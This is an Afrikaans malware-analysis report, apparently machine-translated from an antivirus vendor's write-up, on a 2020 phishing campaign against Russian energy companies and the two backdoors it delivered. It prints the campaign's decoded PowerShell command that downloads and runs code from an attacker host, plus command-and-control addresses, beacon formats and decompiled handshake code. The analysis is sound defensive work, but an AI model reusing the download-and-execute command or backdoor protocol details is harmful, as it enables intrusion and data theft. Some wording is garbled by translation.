Ons ondervinding met die ondersoek van rekenaarsekuriteitsinsidente toon dat e-pos steeds een van die mees algemene kanale is wat deur aanvallers gebruik word om aanvanklik aangeval netwerkinfrastruktuur binne te dring. Een onverskillige optrede met 'n verdagte (of nie so verdagte) brief word 'n toegangspunt vir verdere infeksie, en daarom gebruik kubermisdadigers aktief sosiale ingenieurswese-metodes, al is dit met wisselende mate van sukses.
In hierdie pos wil ons praat oor ons onlangse ondersoek na 'n strooiposveldtog wat 'n aantal ondernemings in die Russiese brandstof- en energiekompleks teiken. Alle aanvalle het dieselfde scenario gevolg deur vals e-posse te gebruik, en dit lyk asof niemand veel moeite gedoen het met die teksinhoud van hierdie e-posse nie.
Intelligensiediens
Dit het alles begin aan die einde van April 2020, toe Doctor Web-virusontleders 'n strooiposveldtog opgespoor het waarin kuberkrakers 'n bygewerkte telefoongids aan werknemers van 'n aantal ondernemings in die Russiese brandstof- en energiekompleks gestuur het. Natuurlik was dit nie 'n eenvoudige blyk van kommer nie, aangesien die gids nie werklik was nie, en die .docx-dokumente het twee beelde van afgeleë bronne afgelaai.
Een daarvan is vanaf die nuus[.]zannews[.]com-bediener na die gebruiker se rekenaar afgelaai. Dit is opmerklik dat die domeinnaam soortgelyk is aan die domein van die anti-korrupsie mediasentrum van Kazakhstan - zannews[.]kz. Aan die ander kant het die domein wat gebruik is, dadelik herinner aan 'n ander 2015-veldtog bekend as TOPNEWS, wat 'n ICEFOG-agterdeur gebruik het en Trojaanse beheerdomeine gehad het met die substring "nuus" in hul name. Nog 'n interessante kenmerk was dat wanneer e-posse aan verskillende ontvangers gestuur word, versoeke om 'n prent af te laai, óf verskillende versoekparameters óf unieke prentname gebruik het.
Ons glo dat dit gedoen is met die doel om inligting in te samel om 'n "betroubare" geadresseerde te identifiseer, wat dan gewaarborg sal wees om die brief op die regte tyd oop te maak. Die SMB-protokol is gebruik om die beeld van die tweede bediener af te laai, wat gedoen kan word om NetNTLM-hashes te versamel vanaf die rekenaars van werknemers wat die ontvangde dokument oopgemaak het.
En hier is die brief self met die vals gids:
In Junie vanjaar het kuberkrakers 'n nuwe domeinnaam, sports[.]manhajnews[.]com, begin gebruik om beelde op te laai. Die ontleding het getoon dat manhajnews[.]com-subdomeine sedert ten minste September 2019 in strooipospos gebruik word. Een van die teikens van hierdie veldtog was 'n groot Russiese universiteit.
Teen Junie het die organiseerders van die aanval ook met 'n nuwe teks vir hul briewe vorendag gekom: hierdie keer bevat die dokument inligting oor bedryfsontwikkeling. Die teks van die brief het duidelik aangedui dat die skrywer óf nie 'n moedertaalspreker van Russies was nie, óf doelbewus so 'n indruk oor homself geskep het. Ongelukkig het die idees van industrie-ontwikkeling, soos altyd, geblyk net 'n voorblad te wees - die dokument het weer twee beelde afgelaai, terwyl die bediener verander is na aflaai[.]inklingpaper[.]com.
Die volgende innovasie het in Julie gevolg. In 'n poging om die opsporing van kwaadwillige dokumente deur antivirusprogramme te omseil, het aanvallers Microsoft Word-dokumente begin gebruik wat met 'n wagwoord geïnkripteer is. Terselfdertyd het die aanvallers besluit om 'n klassieke sosiale ingenieurstegniek te gebruik - beloningkennisgewing.
Die teks van die appèl is weer in dieselfde styl geskryf, wat bykomende agterdog by die geadresseerde gewek het. Die bediener vir die aflaai van die prent het ook nie verander nie.
Let daarop dat elektroniese posbusse wat op die mail[.]ru- en yandex[.]ru-domeine geregistreer is in alle gevalle gebruik is om briewe te stuur.
aanval
Teen vroeg in September 2020 was dit tyd vir aksie. Ons virusontleders het 'n nuwe vlaag aanvalle aangeteken, waarin aanvallers weer briewe gestuur het onder die voorwendsel om 'n telefoongids by te werk. Hierdie keer het die aanhangsel egter 'n kwaadwillige makro bevat.
Toe die aangehegte dokument oopgemaak word, het die makro twee lêers geskep:
- VBS-skrip %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, wat bedoel was om 'n bondellêer te begin;
- Die bondellêer self %APPDATA%configstest.bat, wat verduister is.
Die kern van sy werk kom daarop neer dat die Powershell-dop met sekere parameters bekendgestel word. Die parameters wat na die dop oorgedra word, word in opdragte gedekodeer:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Soos volg uit die opdragte wat aangebied word, is die domein waarvandaan die loonvrag afgelaai word weer vermom as 'n nuuswebwerf. 'n Eenvoudige , wie se enigste taak is om dopkode van die opdrag- en beheerbediener te ontvang en dit uit te voer. Ons kon twee tipes agterdeure identifiseer wat op die slagoffer se rekenaar geïnstalleer kan word.
Agterdeur.Siggen2.3238
Die eerste een is Agterdeur.Siggen2.3238 - ons spesialiste het nog nie tevore teëgekom nie, en daar was ook geen melding van hierdie program deur ander antivirusverskaffers nie.
Hierdie program is 'n agterdeur geskryf in C++ en loop op 32-bis Windows-bedryfstelsels.
Agterdeur.Siggen2.3238 is in staat om met die bestuursbediener te kommunikeer deur twee protokolle te gebruik: HTTP en HTTPS. Die getoetste monster gebruik die HTTPS-protokol. Die volgende User-Agent word gebruik in versoeke aan die bediener:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
In hierdie geval word alle versoeke met die volgende stel parameters voorsien:
%s;type=%s;length=%s;realdata=%send
waar elke reël %s dienooreenkomstig vervang word deur:
- ID van die besmette rekenaar,
- tipe versoek wat gestuur word,
- lengte van data in die realdata-veld,
- die data.
Op die stadium van die insameling van inligting oor die besmette stelsel, genereer die agterdeur 'n lyn soos:
lan=%s;cmpname=%s;username=%s;version=%s;
waar lan die IP-adres van die besmette rekenaar is, cmpname die rekenaarnaam is, gebruikersnaam die gebruikersnaam is, weergawe die reël 0.0.4.03 is.
Hierdie inligting met die sysinfo-identifiseerder word via 'n POST-versoek gestuur na die beheerbediener geleë by https[:]//31.214[.]157.14/log.txt. As in reaksie Agterdeur.Siggen2.3238 ontvang die HART-sein, die verbinding word as suksesvol beskou, en die agterdeur begin die hoofsiklus van kommunikasie met die bediener.
Meer volledige beskrywing van bedryfsbeginsels Agterdeur.Siggen2.3238 is in ons .
Agterdeur.Witvoël.23
Die tweede program is 'n wysiging van die BackDoor.Whitebird-agterdeur, reeds aan ons bekend van die voorval met 'n regeringsagentskap in Kazakstan. Hierdie weergawe is in C++ geskryf en is ontwerp om op beide 32-bis en 64-bis Windows-bedryfstelsels te werk.
Soos die meeste programme van hierdie tipe, Agterdeur.Witvoël.23 ontwerp om 'n geënkripteerde verbinding met die beheerbediener en ongemagtigde beheer van 'n besmette rekenaar te vestig. Geïnstalleer in 'n gekompromitteerde stelsel met behulp van 'n drupper .
Die monster wat ons ondersoek het, was 'n kwaadwillige biblioteek met twee uitvoere:
- Google Play
- Toets.
Aan die begin van sy werk dekripteer dit die konfigurasie wat in die agterdeur-liggaam vasgemaak is met behulp van 'n algoritme gebaseer op die XOR-bewerking met greep 0x99. Die konfigurasie lyk soos volg:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Om sy konstante werking te verseker, verander die agterdeur die waarde wat in die veld gespesifiseer word werksure konfigurasies. Die veld bevat 1440 grepe, wat die waardes 0 of 1 neem en elke minuut van elke uur in die dag verteenwoordig. Skep 'n aparte draad vir elke netwerkkoppelvlak wat na die koppelvlak luister en soek na magtigingspakkies op die instaanbediener vanaf die besmette rekenaar. Wanneer so 'n pakkie opgespoor word, voeg die agterdeur inligting oor die instaanbediener by sy lys. Kontroleer ook vir die teenwoordigheid van 'n instaanbediener via WinAPI InternetQueryOptionW.
Die program kontroleer die huidige minuut en uur en vergelyk dit met die data in die veld werksure konfigurasies. As die waarde vir die ooreenstemmende minuut van die dag nie nul is nie, word 'n verbinding met die beheerbediener tot stand gebring.
Die vestiging van 'n verbinding met die bediener simuleer die skep van 'n verbinding deur die TLS weergawe 1.0-protokol tussen die kliënt en die bediener te gebruik. Die liggaam van die agterdeur bevat twee buffers.
Die eerste buffer bevat die TLS 1.0 Client Hello-pakkie.
Die tweede buffer bevat TLS 1.0 Client Key Exchange-pakkies met 'n sleutellengte van 0x100 grepe, Change Cipher Spec, Encrypted Handshake Message.
Wanneer 'n kliënt Hallo-pakkie gestuur word, skryf die agterdeur 4 grepe van die huidige tyd en 28 grepe pseudo-ewekansige data in die Client Random-veld, soos volg bereken:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Die ontvangde pakkie word na die beheerbediener gestuur. Die antwoord (Server Hello-pakkie) kontroleer:
- voldoening aan TLS-protokol weergawe 1.0;
- korrespondensie van die tydstempel (die eerste 4 grepe van die Random Data-pakkieveld) gespesifiseer deur die kliënt met die tydstempel gespesifiseer deur die bediener;
- passing van die eerste 4 grepe na die tydstempel in die Random Data-veld van die kliënt en bediener.
In die geval van die gespesifiseerde passings, berei die agterdeur 'n kliëntsleuteluitruilpakkie voor. Om dit te doen, verander dit die publieke sleutel in die kliëntsleuteluitruilpakket, sowel as die enkripsie IV en enkripsiedata in die geënkripteerde handdrukboodskappakket.
Die agterdeur ontvang dan die pakkie van die opdrag- en beheerbediener, kontroleer dat die TLS-protokolweergawe 1.0 is, en aanvaar dan nog 54 grepe (die liggaam van die pakkie). Dit voltooi die verbindingsopstelling.
Meer volledige beskrywing van bedryfsbeginsels Agterdeur.Witvoël.23 is in ons .
Gevolgtrekking en Gevolgtrekkings
Ontleding van dokumente, wanware en die infrastruktuur wat gebruik word, stel ons in staat om met vertroue te sê dat die aanval deur een van die Chinese APT-groepe voorberei is. Met inagneming van die funksionaliteit van agterdeure wat op slagoffers se rekenaars geïnstalleer word in die geval van 'n suksesvolle aanval, lei infeksie ten minste tot die diefstal van vertroulike inligting vanaf die rekenaars van aangeval organisasies.
Daarbenewens is 'n baie waarskynlike scenario die installering van gespesialiseerde Trojans op plaaslike bedieners met 'n spesiale funksie. Dit kan domeinbeheerders, posbedieners, internetpoorte, ens wees. Soos ons in die voorbeeld kon sien , is sulke bedieners om verskeie redes van besondere belang vir aanvallers.
Bron: will.com